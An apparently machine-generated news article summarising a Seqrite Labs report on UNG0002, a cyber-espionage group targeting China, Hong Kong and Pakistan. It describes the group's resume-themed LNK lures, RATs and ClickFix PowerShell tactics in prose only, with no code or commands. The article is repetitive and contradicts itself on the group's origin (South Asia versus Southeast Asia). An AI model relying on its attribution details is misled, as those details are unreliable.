Ethical Hacking News
A new threat actor has been identified by Seqrite Labs as responsible for a series of high-profile attacks targeting multiple sectors in China, Hong Kong, and Pakistan. Dubbed UNG0002, this group uses sophisticated tactics, including spear-phishing and post-exploitation frameworks, to deliver their payload. The attack chains involved LNK files masquerading as resumes, INET RAT, and Blister DLL loader, highlighting the group's adaptability and technical proficiency. Organizations operating in these jurisdictions must take immediate action to protect themselves against this threat entity.
The UNG0002 (Unknown Group 0002) group is a sophisticated threat entity from South Asia that has been actively engaged in a broader cyber espionage campaign, targeting multiple sectors in China, Hong Kong, and Pakistan. The group uses shortcut files, VBScript, and post-exploitation tools like Cobalt Strike and Metasploit to deliver their payload, often deploying CV-themed decoy documents to lure victims into a trap. Two major campaigns have been identified: Operation Cobalt Whisper and Operation AmberMist, both involving spear-phishing attacks and the deployment of post-exploitation frameworks. The group uses a multi-stage infection process, deploying INET RAT and Blister DLL loader to establish contact with a remote server and execute Shadow RAT. Alternate attack sequences have been detected using ClickFix tactics to launch PowerShell commands, which are used to execute Shadow RAT via DLL side-loading. The group's high adaptability and technical proficiency, combined with their ability to evolve their toolset while maintaining consistent TTPs, make them a significant concern for organizations operating in targeted jurisdictions. Implementing robust security measures such as multi-factor authentication, keeping software up-to-date, and conducting regular security audits is essential to protect against this threat entity.
The cybersecurity landscape has been constantly evolving, with threat actors continuously adapting their tactics, techniques, and procedures (TTPs) to evade detection. Recently, Seqrite Labs researcher Subhajeet Singha shed light on a sophisticated and persistent threat entity from South Asia, tracked as UNG0002 (aka Unknown Group 0002). This group has been actively engaged in a broader cyber espionage campaign, targeting multiple sectors in China, Hong Kong, and Pakistan.
The UNG0002 group's modus operandi (MO) revolves around using shortcut files (LNK), VBScript, and post-exploitation tools such as Cobalt Strike and Metasploit to deliver their payload. Consistently, they deploy CV-themed decoy documents to lure victims into a trap. This tactic is particularly noteworthy, as it demonstrates the group's sophisticated understanding of human psychology and their ability to craft convincing lures.
The activity encompasses two major campaigns: Operation Cobalt Whisper and Operation AmberMist. Operation Cobalt Whisper took place between May and September 2024 and involved the use of ZIP archives propagated via spear-phishing attacks to deliver Cobalt Strike beacons, a post-exploitation framework, using LNK and Visual Basic Scripts as interim payloads. Seqrite Labs initially documented this campaign in late October 2024.
The AmberMist attack chains have been found to leverage spear-phishing emails as a starting point to deliver LNK files masquerading as curriculum vitae and resumes. This multi-stage infection process results in the deployment of INET RAT and Blister DLL loader, which are used to execute Shadow RAT. The latter is capable of establishing contact with a remote server to await further commands.
Alternate attack sequences detected in January 2025 have been found to redirect email recipients to fake landing pages spoofing Pakistan's Ministry of Maritime Affairs (MoMA) website. These fake CAPTCHA verification checks employ ClickFix tactics to launch PowerShell commands, which are used to execute Shadow RAT via DLL side-loading.
The exact origins of the UNG0002 group remain unclear, but evidence points to it being an espionage-focused group from Southeast Asia. This group demonstrates high adaptability and technical proficiency, continuously evolving their toolset while maintaining consistent TTPs.
The impact of this threat entity cannot be overstated, as they have been targeting multiple sectors in China, Hong Kong, and Pakistan. The groups' ability to evolve their tactics and maintain a persistent presence is a significant concern for organizations operating in these jurisdictions.
Furthermore, the use of post-exploitation frameworks such as Cobalt Strike and Metasploit by UNG0002 highlights the sophistication of this threat entity. These tools are commonly used by advanced persistent threats (APTs) to establish a foothold on compromised systems. The deployment of INET RAT and Blister DLL loader adds to the group's arsenal, providing them with additional tools for persistence and command and control.
In light of this latest development, it is essential that organizations operating in China, Hong Kong, and Pakistan take immediate action to protect themselves against this threat entity. This includes implementing robust security measures such as multi-factor authentication, keeping software up-to-date, and conducting regular security audits.
The cyber espionage landscape is constantly evolving, and threat actors are becoming increasingly sophisticated in their tactics. The UNG0002 group's activities serve as a reminder of the importance of staying vigilant and proactive in defending against cyber threats.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Sophisticated-and-Persistent-Threat-Entity-from-South-Asia-The-UNG0002-Group-ehn.shtml
https://thehackernews.com/2025/07/ung0002-group-hits-china-hong-kong.html
Published: Fri Jul 18 16:05:24 2025 by llama3.2 3B Q4_K_M
